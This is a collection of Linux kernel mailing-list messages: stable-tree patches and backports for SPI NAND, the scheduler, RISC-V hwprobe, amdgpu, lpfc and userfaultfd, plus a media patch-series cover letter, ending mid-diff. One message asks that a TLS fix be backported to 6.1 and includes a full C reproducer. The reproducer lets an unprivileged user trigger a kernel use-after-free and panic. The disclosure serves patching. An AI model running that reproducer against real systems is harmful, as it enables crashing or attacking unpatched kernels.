Since commit 3d1f08b032dc ("mtd: spinand: Use the external ECC engine
logic") the spinand_write_page() function ignores the errors returned
by spinand_wait(). Change the code to propagate those up to the stack
as it was done before the offending change.
Cc: stable(a)vger.kernel.org
Fixes: 3d1f08b032dc ("mtd: spinand: Use the external ECC engine logic")
Signed-off-by: Gabor Juhos <j4g8y7(a)gmail.com>
Signed-off-by: Miquel Raynal <miquel.raynal(a)bootlin.com>
---
drivers/mtd/nand/spi/core.c | 5 ++++-
1 file changed, 4 insertions(+), 1 deletion(-)
diff --git a/drivers/mtd/nand/spi/core.c b/drivers/mtd/nand/spi/core.c
index daf6efb87d8..3e21a06dd0f 100644
--- a/drivers/mtd/nand/spi/core.c
+++ b/drivers/mtd/nand/spi/core.c
@@ -691,7 +691,10 @@ int spinand_write_page(struct spinand_device *spinand,
SPINAND_WRITE_INITIAL_DELAY_US,
SPINAND_WRITE_POLL_DELAY_US,
&status);
- if (!ret && (status & STATUS_PROG_FAILED))
+ if (ret)
+ return ret;
+
+ if (status & STATUS_PROG_FAILED)
return -EIO;
return spinand_ondie_ecc_finish_io_req(nand, (struct nand_page_io_req *)req);
--
2.47.2
On Fri, Aug 08, 2025 at 07:27:26PM -0400, Sasha Levin wrote:
> This is a note to let you know that I've just added the patch titled
>
> sched: Do not call __put_task_struct() on rt if pi_blocked_on is set
>
> to the 6.16-stable tree which can be found at:
> http://www.kernel.org/git/?p=linux/kernel/git/stable/stable-queue.git;a=sum…
>
> The filename of the patch is:
> sched-do-not-call-__put_task_struct-on-rt-if-pi_bloc.patch
> and it can be found in the queue-6.16 subdirectory.
>
> If you, or anyone else, feels it should not be added to the stable tree,
> please let <stable(a)vger.kernel.org> know about it.
Hi Sasha!
I am the author of that patch and I sent a follow-up patch that fixes a
mistake I made on the original patch:
[RESEND PATCH] sched: restore the behavior of put_task_struct() for non-rt
https://lore.kernel.org/all/aJOwe_ZS5rHXMrsO@uudg.org/
The patch you have does not match what is in the description. I unfortunately
sent the wrong version of the patch on the verge of leaving for a long vacation
and only noticed that when I returned. The code is correct, but does not
match the commit description and is a change that I would like to propose
later as an RFC, not the simpler bugfix originally intended.
I suggest waiting for the follow-up patch mentioned above to include both on
stable kernels.
Sorry for the inconvenience,
Luis
>
>
> commit 7bed29f5ad955444283dca82476dd92c59923f73
> Author: Luis Claudio R. Goncalves <lgoncalv(a)redhat.com>
> Date: Mon Jul 7 11:03:59 2025 -0300
>
> sched: Do not call __put_task_struct() on rt if pi_blocked_on is set
>
> [ Upstream commit 8671bad873ebeb082afcf7b4501395c374da6023 ]
>
> With PREEMPT_RT enabled, some of the calls to put_task_struct() coming
> from rt_mutex_adjust_prio_chain() could happen in preemptible context and
> with a mutex enqueued. That could lead to this sequence:
>
> rt_mutex_adjust_prio_chain()
> put_task_struct()
> __put_task_struct()
> sched_ext_free()
> spin_lock_irqsave()
> rtlock_lock() ---> TRIGGERS
> lockdep_assert(!current->pi_blocked_on);
>
> This is not a SCHED_EXT bug. The first cleanup function called by
> __put_task_struct() is sched_ext_free() and it happens to take a
> (RT) spin_lock, which in the scenario described above, would trigger
> the lockdep assertion of "!current->pi_blocked_on".
>
> Crystal Wood was able to identify the problem as __put_task_struct()
> being called during rt_mutex_adjust_prio_chain(), in the context of
> a process with a mutex enqueued.
>
> Instead of adding more complex conditions to decide when to directly
> call __put_task_struct() and when to defer the call, unconditionally
> resort to the deferred call on PREEMPT_RT to simplify the code.
>
> Fixes: 893cdaaa3977 ("sched: avoid false lockdep splat in put_task_struct()")
> Suggested-by: Crystal Wood <crwood(a)redhat.com>
> Signed-off-by: Luis Claudio R. Goncalves <lgoncalv(a)redhat.com>
> Signed-off-by: Peter Zijlstra (Intel) <peterz(a)infradead.org>
> Reviewed-by: Wander Lairson Costa <wander(a)redhat.com>
> Reviewed-by: Valentin Schneider <vschneid(a)redhat.com>
> Reviewed-by: Sebastian Andrzej Siewior <bigeasy(a)linutronix.de>
> Link: https://lore.kernel.org/r/aGvTz5VaPFyj0pBV@uudg.org
> Signed-off-by: Sasha Levin <sashal(a)kernel.org>
>
> diff --git a/include/linux/sched/task.h b/include/linux/sched/task.h
> index ca1db4b92c32..58ce71715268 100644
> --- a/include/linux/sched/task.h
> +++ b/include/linux/sched/task.h
> @@ -135,24 +135,17 @@ static inline void put_task_struct(struct task_struct *t)
> return;
>
> /*
> - * In !RT, it is always safe to call __put_task_struct().
> - * Under RT, we can only call it in preemptible context.
> - */
> - if (!IS_ENABLED(CONFIG_PREEMPT_RT) || preemptible()) {
> - static DEFINE_WAIT_OVERRIDE_MAP(put_task_map, LD_WAIT_SLEEP);
> -
> - lock_map_acquire_try(&put_task_map);
> - __put_task_struct(t);
> - lock_map_release(&put_task_map);
> - return;
> - }
> -
> - /*
> - * under PREEMPT_RT, we can't call put_task_struct
> + * Under PREEMPT_RT, we can't call __put_task_struct
> * in atomic context because it will indirectly
> - * acquire sleeping locks.
> + * acquire sleeping locks. The same is true if the
> + * current process has a mutex enqueued (blocked on
> + * a PI chain).
> + *
> + * In !RT, it is always safe to call __put_task_struct().
> + * Though, in order to simplify the code, resort to the
> + * deferred call too.
> *
> - * call_rcu() will schedule delayed_put_task_struct_rcu()
> + * call_rcu() will schedule __put_task_struct_rcu_cb()
> * to be called in process context.
> *
> * __put_task_struct() is called when
> @@ -165,7 +158,7 @@ static inline void put_task_struct(struct task_struct *t)
> *
> * delayed_free_task() also uses ->rcu, but it is only called
> * when it fails to fork a process. Therefore, there is no
> - * way it can conflict with put_task_struct().
> + * way it can conflict with __put_task_struct().
> */
> call_rcu(&t->rcu, __put_task_struct_rcu_cb);
> }
>
---end quoted text---
Hi all,
Commit 41532b785e (tls: separate no-async decryption request handling from async) [1] actually covers a UAF read and write bug in the kernel, and should be backported to 6.1. As of now, it has only been backported to 6.6, back from the time when the patch was committed. The commit mentions a non-reproducible UAF that was previously observed, but we managed to hit the vulnerable case.
The vulnerable case is when a user wraps an existing crypto algorithm (such as gcm or ghash) in cryptd. By default, cryptd-wrapped algorithms have a higher priority than the base variant. tls_decrypt_sg allocates the aead request, and triggers the crypto handling with tls_do_decryption. When the crypto is handled by cryptd, it gets dispatched to a worker that handles it and initially returns EINPROGRESS. While older LTS versions (5.4, 5.10, and 5.15) seem to have an additional crypto_wait_req call in those cases, 6.1 just returns success and frees the aead request. The cryptd worker could still be operating in this case, which causes a UAF.
However, this vulnerability only occurs when the CPU is without AVX support (perhaps this is why there were reproducibility difficulties). With AVX, aesni_init calls simd_register_aeads_compat to force the crypto subsystem to use the SIMD version and avoids the async issues raised by cryptd. While I doubt many people are using host systems without AVX these days, this environment is pretty common in VMs when QEMU uses KVM without using the "-cpu host" flag.
The following is a repro, and can be triggered from unprivileged users. Multishot KASAN shows multiple UAF reads and writes, and ends up panicking the system with a null dereference.
#define _GNU_SOURCE
#include <stdio.h>
#include <stdlib.h>
#include <stdbool.h>
#include <string.h>
#include <unistd.h>
#include <sched.h>
#include <arpa/inet.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <linux/tcp.h>
#include <linux/tls.h>
#include <sys/resource.h>
#include <fcntl.h>
#include <sys/mman.h>
#include <linux/if_alg.h>
#include <signal.h>
#include <sys/wait.h>
#include <time.h>
struct tls_conn {
int tx;
int rx;
};
void tls_enable(int sk, int type) {
struct tls12_crypto_info_aes_gcm_256 tls_ci = {
.info.version = TLS_1_3_VERSION,
.info.cipher_type = TLS_CIPHER_AES_GCM_256,
};
setsockopt(sk, IPPROTO_TCP, TCP_ULP, "tls", sizeof("tls"));
setsockopt(sk, SOL_TLS, type, &tls_ci, sizeof(tls_ci));
}
struct tls_conn *tls_create_conn(int port) {
int s0 = socket(AF_INET, SOCK_STREAM, 0);
int s1 = socket(AF_INET, SOCK_STREAM, 0);
struct sockaddr_in a = {
.sin_family = AF_INET,
.sin_port = htons(port),
.sin_addr = htobe32(0),
};
bind(s0, (struct sockaddr*)&a, sizeof(a));
listen(s0, 1);
connect(s1, (struct sockaddr *)&a, sizeof(a));
int s2 = accept(s0, 0, 0);
close(s0);
tls_enable(s1, TLS_TX);
tls_enable(s2, TLS_RX);
struct tls_conn *t = calloc(1, sizeof(struct tls_conn));
t->tx = s1;
t->rx = s2;
return t;
}
void tls_destroy_conn(struct tls_conn *t) {
close(t->tx);
close(t->rx);
free(t);
}
int tls_send(struct tls_conn *t, char *data, size_t size) {
return sendto(t->tx, data, size, 0, NULL, 0);
}
int tls_recv(struct tls_conn *t, char *data, size_t size) {
return recvfrom(t->rx, data, size, 0, NULL, NULL);
}
int crypto_register_algo(char *type, char *name) {
int s = socket(AF_ALG, SOCK_SEQPACKET, 0);
struct sockaddr_alg sa = {};
sa.salg_family = AF_ALG;
strcpy(sa.salg_type, type);
strcpy(sa.salg_name, name);
bind(s, (struct sockaddr *)&sa, sizeof(sa));
close(s);
return 0;
}
int main(void) {
char buff[0x2000];
crypto_register_algo("aead", "cryptd(gcm(aes))");
struct tls_conn *t = tls_create_conn(20000);
tls_send(t, buff, 0x10);
tls_recv(t, buff, 0x100);
}
Feel free to let us know if you have any questions and if there is anything else we can do to help.
Best,
Will
Savy
[1] https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?…
The hwprobe vDSO data for some keys, like MISALIGNED_VECTOR_PERF,
is determined by an asynchronous kthread. This can create a race
condition where the kthread finishes after the vDSO data has
already been populated, causing userspace to read stale values.
To fix this race, a new 'ready' flag is added to the vDSO data,
initialized to 'false' during arch_initcall_sync. This flag is
checked by both the vDSO's user-space code and the riscv_hwprobe
syscall. The syscall serves as a one-time gate, using a completion
to wait for any pending probes before populating the data and
setting the flag to 'true', thus ensuring userspace reads fresh
values on its first request.
Reported-by: Tsukasa OI <research_trasio(a)irq.a4lg.com>
Closes: https://lore.kernel.org/linux-riscv/760d637b-b13b-4518-b6bf-883d55d44e7f@ir…
Fixes: e7c9d66e313b ("RISC-V: Report vector unaligned access speed hwprobe")
Cc: Palmer Dabbelt <palmer(a)dabbelt.com>
Cc: Alexandre Ghiti <alexghiti(a)rivosinc.com>
Cc: Olof Johansson <olof(a)lixom.net>
Cc: stable(a)vger.kernel.org
Reviewed-by: Alexandre Ghiti <alexghiti(a)rivosinc.com>
Co-developed-by: Palmer Dabbelt <palmer(a)dabbelt.com>
Signed-off-by: Palmer Dabbelt <palmer(a)dabbelt.com>
Signed-off-by: Jingwei Wang <wangjingwei(a)iscas.ac.cn>
---
Changes in v8:
- Based on feedback from Alexandre, reverted the initcall back to
arch_initcall_sync since the DO_ONCE logic makes a late init redundant.
- Added the required Reviewed-by and Signed-off-by tags and fixed minor
formatting nits.
Changes in v7:
- Refined the on-demand synchronization by using the DO_ONCE_SLEEPABLE
macro.
- Fixed a build error for nommu configs and addressed several coding
style issues reported by the CI.
Changes in v6:
- Based on Palmer's feedback, reworked the synchronization to be on-demand,
deferring the wait until the first hwprobe syscall via a 'ready' flag.
This avoids the boot-time regression from v5's approach.
Changes in v5:
- Reworked the synchronization logic to a robust "sentinel-count"
pattern based on feedback from Alexandre.
- Fixed a "multiple definition" linker error for nommu builds by changing
the header-file stub functions to `static inline`, as pointed out by Olof.
- Updated the commit message to better explain the rationale for moving
the vDSO initialization to `late_initcall`.
Changes in v4:
- Reworked the synchronization mechanism based on feedback from Palmer
and Alexandre.
- Instead of a post-hoc refresh, this version introduces a robust
completion-based framework using an atomic counter to ensure async
probes are finished before populating the vDSO.
- Moved the vdso data initialization to a late_initcall to avoid
impacting boot time.
Changes in v3:
- Retained existing blank line.
Changes in v2:
- Addressed feedback from Yixun's regarding #ifdef CONFIG_MMU usage.
- Updated commit message to provide a high-level summary.
- Added Fixes tag for commit e7c9d66e313b.
v1: https://lore.kernel.org/linux-riscv/20250521052754.185231-1-wangjingwei@isc…
arch/riscv/include/asm/hwprobe.h | 7 +++
arch/riscv/include/asm/vdso/arch_data.h | 6 ++
arch/riscv/kernel/sys_hwprobe.c | 70 ++++++++++++++++++----
arch/riscv/kernel/unaligned_access_speed.c | 9 ++-
arch/riscv/kernel/vdso/hwprobe.c | 2 +-
5 files changed, 79 insertions(+), 15 deletions(-)
diff --git a/arch/riscv/include/asm/hwprobe.h b/arch/riscv/include/asm/hwprobe.h
index 7fe0a379474ae2c6..5fe10724d307dc99 100644
--- a/arch/riscv/include/asm/hwprobe.h
+++ b/arch/riscv/include/asm/hwprobe.h
@@ -41,4 +41,11 @@ static inline bool riscv_hwprobe_pair_cmp(struct riscv_hwprobe *pair,
return pair->value == other_pair->value;
}
+#ifdef CONFIG_MMU
+void riscv_hwprobe_register_async_probe(void);
+void riscv_hwprobe_complete_async_probe(void);
+#else
+static inline void riscv_hwprobe_register_async_probe(void) {}
+static inline void riscv_hwprobe_complete_async_probe(void) {}
+#endif
#endif
diff --git a/arch/riscv/include/asm/vdso/arch_data.h b/arch/riscv/include/asm/vdso/arch_data.h
index da57a3786f7a53c8..88b37af55175129b 100644
--- a/arch/riscv/include/asm/vdso/arch_data.h
+++ b/arch/riscv/include/asm/vdso/arch_data.h
@@ -12,6 +12,12 @@ struct vdso_arch_data {
/* Boolean indicating all CPUs have the same static hwprobe values. */
__u8 homogeneous_cpus;
+
+ /*
+ * A gate to check and see if the hwprobe data is actually ready, as
+ * probing is deferred to avoid boot slowdowns.
+ */
+ __u8 ready;
};
#endif /* __RISCV_ASM_VDSO_ARCH_DATA_H */
diff --git a/arch/riscv/kernel/sys_hwprobe.c b/arch/riscv/kernel/sys_hwprobe.c
index 0b170e18a2beba57..44201160b9c43177 100644
--- a/arch/riscv/kernel/sys_hwprobe.c
+++ b/arch/riscv/kernel/sys_hwprobe.c
@@ -5,6 +5,9 @@
* more details.
*/
#include <linux/syscalls.h>
+#include <linux/completion.h>
+#include <linux/atomic.h>
+#include <linux/once.h>
#include <asm/cacheflush.h>
#include <asm/cpufeature.h>
#include <asm/hwprobe.h>
@@ -452,28 +455,32 @@ static int hwprobe_get_cpus(struct riscv_hwprobe __user *pairs,
return 0;
}
-static int do_riscv_hwprobe(struct riscv_hwprobe __user *pairs,
- size_t pair_count, size_t cpusetsize,
- unsigned long __user *cpus_user,
- unsigned int flags)
-{
- if (flags & RISCV_HWPROBE_WHICH_CPUS)
- return hwprobe_get_cpus(pairs, pair_count, cpusetsize,
- cpus_user, flags);
+#ifdef CONFIG_MMU
- return hwprobe_get_values(pairs, pair_count, cpusetsize,
- cpus_user, flags);
+static DECLARE_COMPLETION(boot_probes_done);
+static atomic_t pending_boot_probes = ATOMIC_INIT(1);
+
+void riscv_hwprobe_register_async_probe(void)
+{
+ atomic_inc(&pending_boot_probes);
}
-#ifdef CONFIG_MMU
+void riscv_hwprobe_complete_async_probe(void)
+{
+ if (atomic_dec_and_test(&pending_boot_probes))
+ complete(&boot_probes_done);
+}
-static int __init init_hwprobe_vdso_data(void)
+static int complete_hwprobe_vdso_data(void)
{
struct vdso_arch_data *avd = vdso_k_arch_data;
u64 id_bitsmash = 0;
struct riscv_hwprobe pair;
int key;
+ if (unlikely(!atomic_dec_and_test(&pending_boot_probes)))
+ wait_for_completion(&boot_probes_done);
+
/*
* Initialize vDSO data with the answers for the "all CPUs" case, to
* save a syscall in the common case.
@@ -501,13 +508,52 @@ static int __init init_hwprobe_vdso_data(void)
* vDSO should defer to the kernel for exotic cpu masks.
*/
avd->homogeneous_cpus = id_bitsmash != 0 && id_bitsmash != -1;
+
+ /*
+ * Make sure all the VDSO values are visible before we look at them.
+ * This pairs with the implicit "no speculativly visible accesses"
+ * barrier in the VDSO hwprobe code.
+ */
+ smp_wmb();
+ avd->ready = true;
+ return 0;
+}
+
+static int __init init_hwprobe_vdso_data(void)
+{
+ struct vdso_arch_data *avd = vdso_k_arch_data;
+
+ /*
+ * Prevent the vDSO cached values from being used, as they're not ready
+ * yet.
+ */
+ avd->ready = false;
return 0;
}
arch_initcall_sync(init_hwprobe_vdso_data);
+#else
+
+static int complete_hwprobe_vdso_data(void) { return 0; }
+
#endif /* CONFIG_MMU */
+static int do_riscv_hwprobe(struct riscv_hwprobe __user *pairs,
+ size_t pair_count, size_t cpusetsize,
+ unsigned long __user *cpus_user,
+ unsigned int flags)
+{
+ DO_ONCE_SLEEPABLE(complete_hwprobe_vdso_data);
+
+ if (flags & RISCV_HWPROBE_WHICH_CPUS)
+ return hwprobe_get_cpus(pairs, pair_count, cpusetsize,
+ cpus_user, flags);
+
+ return hwprobe_get_values(pairs, pair_count, cpusetsize,
+ cpus_user, flags);
+}
+
SYSCALL_DEFINE5(riscv_hwprobe, struct riscv_hwprobe __user *, pairs,
size_t, pair_count, size_t, cpusetsize, unsigned long __user *,
cpus, unsigned int, flags)
diff --git a/arch/riscv/kernel/unaligned_access_speed.c b/arch/riscv/kernel/unaligned_access_speed.c
index ae2068425fbcd207..aa912c62fb70ba0e 100644
--- a/arch/riscv/kernel/unaligned_access_speed.c
+++ b/arch/riscv/kernel/unaligned_access_speed.c
@@ -379,6 +379,7 @@ static void check_vector_unaligned_access(struct work_struct *work __always_unus
static int __init vec_check_unaligned_access_speed_all_cpus(void *unused __always_unused)
{
schedule_on_each_cpu(check_vector_unaligned_access);
+ riscv_hwprobe_complete_async_probe();
return 0;
}
@@ -473,8 +474,12 @@ static int __init check_unaligned_access_all_cpus(void)
per_cpu(vector_misaligned_access, cpu) = unaligned_vector_speed_param;
} else if (!check_vector_unaligned_access_emulated_all_cpus() &&
IS_ENABLED(CONFIG_RISCV_PROBE_VECTOR_UNALIGNED_ACCESS)) {
- kthread_run(vec_check_unaligned_access_speed_all_cpus,
- NULL, "vec_check_unaligned_access_speed_all_cpus");
+ riscv_hwprobe_register_async_probe();
+ if (IS_ERR(kthread_run(vec_check_unaligned_access_speed_all_cpus,
+ NULL, "vec_check_unaligned_access_speed_all_cpus"))) {
+ pr_warn("Failed to create vec_unalign_check kthread\n");
+ riscv_hwprobe_complete_async_probe();
+ }
}
/*
diff --git a/arch/riscv/kernel/vdso/hwprobe.c b/arch/riscv/kernel/vdso/hwprobe.c
index 2ddeba6c68dda09b..bf77b4c1d2d8e803 100644
--- a/arch/riscv/kernel/vdso/hwprobe.c
+++ b/arch/riscv/kernel/vdso/hwprobe.c
@@ -27,7 +27,7 @@ static int riscv_vdso_get_values(struct riscv_hwprobe *pairs, size_t pair_count,
* homogeneous, then this function can handle requests for arbitrary
* masks.
*/
- if ((flags != 0) || (!all_cpus && !avd->homogeneous_cpus))
+ if ((flags != 0) || (!all_cpus && !avd->homogeneous_cpus) || unlikely(!avd->ready))
return riscv_hwprobe(pairs, pair_count, cpusetsize, cpus, flags);
/* This is something we can handle, fill out the pairs. */
--
2.50.1
From: Guchun Chen <guchun.chen(a)amd.com>
[ Upstream commit 248b061689a40f4fed05252ee2c89f87cf26d7d8 ]
In current code, when a PCI error state pci_channel_io_normal is detectd,
it will report PCI_ERS_RESULT_CAN_RECOVER status to PCI driver, and PCI
driver will continue the execution of PCI resume callback report_resume by
pci_walk_bridge, and the callback will go into amdgpu_pci_resume
finally, where write lock is releasd unconditionally without acquiring
such lock first. In this case, a deadlock will happen when other threads
start to acquire the read lock.
To fix this, add a member in amdgpu_device strucutre to cache
pci_channel_state, and only continue the execution in amdgpu_pci_resume
when it's pci_channel_io_frozen.
Fixes: c9a6b82f45e2 ("drm/amdgpu: Implement DPC recovery")
Suggested-by: Andrey Grodzovsky <andrey.grodzovsky(a)amd.com>
Signed-off-by: Guchun Chen <guchun.chen(a)amd.com>
Reviewed-by: Andrey Grodzovsky <andrey.grodzovsky(a)amd.com>
Signed-off-by: Alex Deucher <alexander.deucher(a)amd.com>
Signed-off-by: Sasha Levin <sashal(a)kernel.org>
[Shivani: Modified to apply on 5.10.y]
Signed-off-by: Shivani Agarwal <shivani.agarwal(a)broadcom.com>
---
drivers/gpu/drm/amd/amdgpu/amdgpu.h | 1 +
drivers/gpu/drm/amd/amdgpu/amdgpu_device.c | 6 ++++++
2 files changed, 7 insertions(+)
diff --git a/drivers/gpu/drm/amd/amdgpu/amdgpu.h b/drivers/gpu/drm/amd/amdgpu/amdgpu.h
index ff5555353eb4..683bbefc39c1 100644
--- a/drivers/gpu/drm/amd/amdgpu/amdgpu.h
+++ b/drivers/gpu/drm/amd/amdgpu/amdgpu.h
@@ -997,6 +997,7 @@ struct amdgpu_device {
bool in_pci_err_recovery;
struct pci_saved_state *pci_state;
+ pci_channel_state_t pci_channel_state;
};
static inline struct amdgpu_device *drm_to_adev(struct drm_device *ddev)
diff --git a/drivers/gpu/drm/amd/amdgpu/amdgpu_device.c b/drivers/gpu/drm/amd/amdgpu/amdgpu_device.c
index 40d2f0ed1c75..8efd3ee2621f 100644
--- a/drivers/gpu/drm/amd/amdgpu/amdgpu_device.c
+++ b/drivers/gpu/drm/amd/amdgpu/amdgpu_device.c
@@ -4944,6 +4944,8 @@ pci_ers_result_t amdgpu_pci_error_detected(struct pci_dev *pdev, pci_channel_sta
return PCI_ERS_RESULT_DISCONNECT;
}
+ adev->pci_channel_state = state;
+
switch (state) {
case pci_channel_io_normal:
return PCI_ERS_RESULT_CAN_RECOVER;
@@ -5079,6 +5081,10 @@ void amdgpu_pci_resume(struct pci_dev *pdev)
DRM_INFO("PCI error: resume callback!!\n");
+ /* Only continue execution for the case of pci_channel_io_frozen */
+ if (adev->pci_channel_state != pci_channel_io_frozen)
+ return;
+
for (i = 0; i < AMDGPU_MAX_RINGS; ++i) {
struct amdgpu_ring *ring = adev->rings[i];
--
2.40.4
Hi,
The first four patches in this series are miscellaneous fixes and
improvements in the Cadence and TI CSI-RX drivers around probing, fwnode
and link creation.
The last two patches add support for transmitting multiple pixels per
clock on the internal bus between Cadence CSI-RX bridge and TI CSI-RX
wrapper. As this internal bus is 32-bit wide, the maximum number of
pixels that can be transmitted per cycle depend upon the format's bit
width. Secondly, the downstream element must support unpacking of
multiple pixels.
Thus we export a module function that can be used by the downstream
driver to negotiate the pixels per cycle on the output pixel stream of
the Cadence bridge.
Signed-off-by: Jai Luthra <jai.luthra(a)ideasonboard.com>
---
Changes in v3:
- Move cdns-csi2rx header to include/media
- Export symbol from cdns-csi2rx.c to be used only through
the j721e-csi2rx.c module namespace
- Other minor fixes suggested by Sakari
- Add Abhilash's T-by tags
- Link to v2: https://lore.kernel.org/r/20250410-probe_fixes-v2-0-801bc6eebdea@ideasonboa…
Changes in v2:
- Rebase on v6.15-rc1
- Fix lkp warnings in PATCH 5/6 missing header for FIELD_PREP
- Add R-By tags from Devarsh and Changhuang
- Link to v1: https://lore.kernel.org/r/20250324-probe_fixes-v1-0-5cd5b9e1cfac@ideasonboa…
---
Jai Luthra (6):
media: ti: j721e-csi2rx: Use devm_of_platform_populate
media: ti: j721e-csi2rx: Use fwnode_get_named_child_node
media: ti: j721e-csi2rx: Fix source subdev link creation
media: cadence: csi2rx: Implement get_fwnode_pad op
media: cadence: cdns-csi2rx: Support multiple pixels per clock cycle
media: ti: j721e-csi2rx: Support multiple pixels per clock
MAINTAINERS | 1 +
drivers/media/platform/cadence/cdns-csi2rx.c | 74 ++++++++++++++++------
drivers/media/platform/ti/Kconfig | 3 +-
.../media/platform/ti/j721e-csi2rx/j721e-csi2rx.c | 65 ++++++++++++++-----
include/media/cadence/cdns-csi2rx.h | 19 ++++++
5 files changed, 127 insertions(+), 35 deletions(-)
---
base-commit: 19272b37aa4f83ca52bdf9c16d5d81bdd1354494
change-id: 20250314-probe_fixes-7e0ec33c7fee
Best regards,
--
Jai Luthra <jai.luthra(a)ideasonboard.com>
From: James Smart <jsmart2021(a)gmail.com>
[ Upstream commit 1854f53ccd88ad4e7568ddfafafffe71f1ceb0a6 ]
If an FC link down transition while PLOGIs are outstanding to fabric well
known addresses, outstanding ABTS requests may result in a NULL pointer
dereference. Driver unload requests may hang with repeated "2878" log
messages.
The Link down processing results in ABTS requests for outstanding ELS
requests. The Abort WQEs are sent for the ELSs before the driver had set
the link state to down. Thus the driver is sending the Abort with the
expectation that an ABTS will be sent on the wire. The Abort request is
stalled waiting for the link to come up. In some conditions the driver may
auto-complete the ELSs thus if the link does come up, the Abort completions
may reference an invalid structure.
Fix by ensuring that Abort set the flag to avoid link traffic if issued due
to conditions where the link failed.
Link: https://lore.kernel.org/r/20211020211417.88754-7-jsmart2021@gmail.com
Co-developed-by: Justin Tee <justin.tee(a)broadcom.com>
Signed-off-by: Justin Tee <justin.tee(a)broadcom.com>
Signed-off-by: James Smart <jsmart2021(a)gmail.com>
Signed-off-by: Martin K. Petersen <martin.petersen(a)oracle.com>
Signed-off-by: Sasha Levin <sashal(a)kernel.org>
[Shivani: Modified to apply on 5.10.y]
Signed-off-by: Shivani Agarwal <shivani.agarwal(a)broadcom.com>
---
drivers/scsi/lpfc/lpfc_sli.c | 8 +++++---
1 file changed, 5 insertions(+), 3 deletions(-)
diff --git a/drivers/scsi/lpfc/lpfc_sli.c b/drivers/scsi/lpfc/lpfc_sli.c
index ff39c596f000..49931577da38 100644
--- a/drivers/scsi/lpfc/lpfc_sli.c
+++ b/drivers/scsi/lpfc/lpfc_sli.c
@@ -11432,10 +11432,12 @@ lpfc_sli_abort_iotag_issue(struct lpfc_hba *phba, struct lpfc_sli_ring *pring,
if (cmdiocb->iocb_flag & LPFC_IO_FOF)
abtsiocbp->iocb_flag |= LPFC_IO_FOF;
- if (phba->link_state >= LPFC_LINK_UP)
- iabt->ulpCommand = CMD_ABORT_XRI_CN;
- else
+ if (phba->link_state < LPFC_LINK_UP ||
+ (phba->sli_rev == LPFC_SLI_REV4 &&
+ phba->sli4_hba.link_state.status == LPFC_FC_LA_TYPE_LINK_DOWN))
iabt->ulpCommand = CMD_CLOSE_XRI_CN;
+ else
+ iabt->ulpCommand = CMD_ABORT_XRI_CN;
abtsiocbp->iocb_cmpl = lpfc_sli_abort_els_cmpl;
abtsiocbp->vport = vport;
--
2.40.4
The quilt patch titled
Subject: proc: proc_maps_open allow proc_mem_open to return NULL
has been removed from the -mm tree. Its filename was
proc-proc_maps_open-allow-proc_mem_open-to-return-null.patch
This patch was dropped because it was merged into the mm-hotfixes-stable branch
of git://git.kernel.org/pub/scm/linux/kernel/git/akpm/mm
------------------------------------------------------
From: Jialin Wang <wjl.linux(a)gmail.com>
Subject: proc: proc_maps_open allow proc_mem_open to return NULL
Date: Fri, 8 Aug 2025 00:54:55 +0800
The commit 65c66047259f ("proc: fix the issue of proc_mem_open returning
NULL") caused proc_maps_open() to return -ESRCH when proc_mem_open()
returns NULL. This breaks legitimate /proc/<pid>/maps access for kernel
threads since kernel threads have NULL mm_struct.
The regression causes perf to fail and exit when profiling a kernel
thread:
# perf record -v -g -p $(pgrep kswapd0)
...
couldn't open /proc/65/task/65/maps
This patch partially reverts the commit to fix it.
Link: https://lkml.kernel.org/r/20250807165455.73656-1-wjl.linux@gmail.com
Fixes: 65c66047259f ("proc: fix the issue of proc_mem_open returning NULL")
Signed-off-by: Jialin Wang <wjl.linux(a)gmail.com>
Cc: Penglei Jiang <superman.xpt(a)gmail.com>
Cc: <stable(a)vger.kernel.org>
Signed-off-by: Andrew Morton <akpm(a)linux-foundation.org>
---
fs/proc/task_mmu.c | 4 ++--
1 file changed, 2 insertions(+), 2 deletions(-)
--- a/fs/proc/task_mmu.c~proc-proc_maps_open-allow-proc_mem_open-to-return-null
+++ a/fs/proc/task_mmu.c
@@ -340,8 +340,8 @@ static int proc_maps_open(struct inode *
priv->inode = inode;
priv->mm = proc_mem_open(inode, PTRACE_MODE_READ);
- if (IS_ERR_OR_NULL(priv->mm)) {
- int err = priv->mm ? PTR_ERR(priv->mm) : -ESRCH;
+ if (IS_ERR(priv->mm)) {
+ int err = PTR_ERR(priv->mm);
seq_release_private(inode, file);
return err;
_
Patches currently in -mm which might be from wjl.linux(a)gmail.com are
The quilt patch titled
Subject: userfaultfd: fix a crash in UFFDIO_MOVE when PMD is a migration entry
has been removed from the -mm tree. Its filename was
userfaultfd-fix-a-crash-in-uffdio_move-when-pmd-is-a-migration-entry.patch
This patch was dropped because it was merged into the mm-hotfixes-stable branch
of git://git.kernel.org/pub/scm/linux/kernel/git/akpm/mm
------------------------------------------------------
From: Suren Baghdasaryan <surenb(a)google.com>
Subject: userfaultfd: fix a crash in UFFDIO_MOVE when PMD is a migration entry
Date: Wed, 6 Aug 2025 15:00:22 -0700
When UFFDIO_MOVE encounters a migration PMD entry, it proceeds with
obtaining a folio and accessing it even though the entry is swp_entry_t.
Add the missing check and let split_huge_pmd() handle migration entries.
While at it also remove unnecessary folio check.
[surenb(a)google.com: remove extra folio check, per David]
Link: https://lkml.kernel.org/r/20250807200418.1963585-1-surenb@google.com
Link: https://lkml.kernel.org/r/20250806220022.926763-1-surenb@google.com
Fixes: adef440691ba ("userfaultfd: UFFDIO_MOVE uABI")
Signed-off-by: Suren Baghdasaryan <surenb(a)google.com>
Reported-by: syzbot+b446dbe27035ef6bd6c2(a)syzkaller.appspotmail.com
Closes: https://lore.kernel.org/all/68794b5c.a70a0220.693ce.0050.GAE@google.com/
Reviewed-by: Peter Xu <peterx(a)redhat.com>
Acked-by: David Hildenbrand <david(a)redhat.com>
Cc: Andrea Arcangeli <aarcange(a)redhat.com>
Cc: Lokesh Gidra <lokeshgidra(a)google.com>
Cc: <stable(a)vger.kernel.org>
Signed-off-by: Andrew Morton <akpm(a)linux-foundation.org>
---
mm/userfaultfd.c | 15 +++++++++------
1 file changed, 9 insertions(+), 6 deletions(-)
--- a/mm/userfaultfd.c~userfaultfd-fix-a-crash-in-uffdio_move-when-pmd-is-a-migration-entry
+++ a/mm/userfaultfd.c
@@ -1821,13 +1821,16 @@ ssize_t move_pages(struct userfaultfd_ct
/* Check if we can move the pmd without splitting it. */
if (move_splits_huge_pmd(dst_addr, src_addr, src_start + len) ||
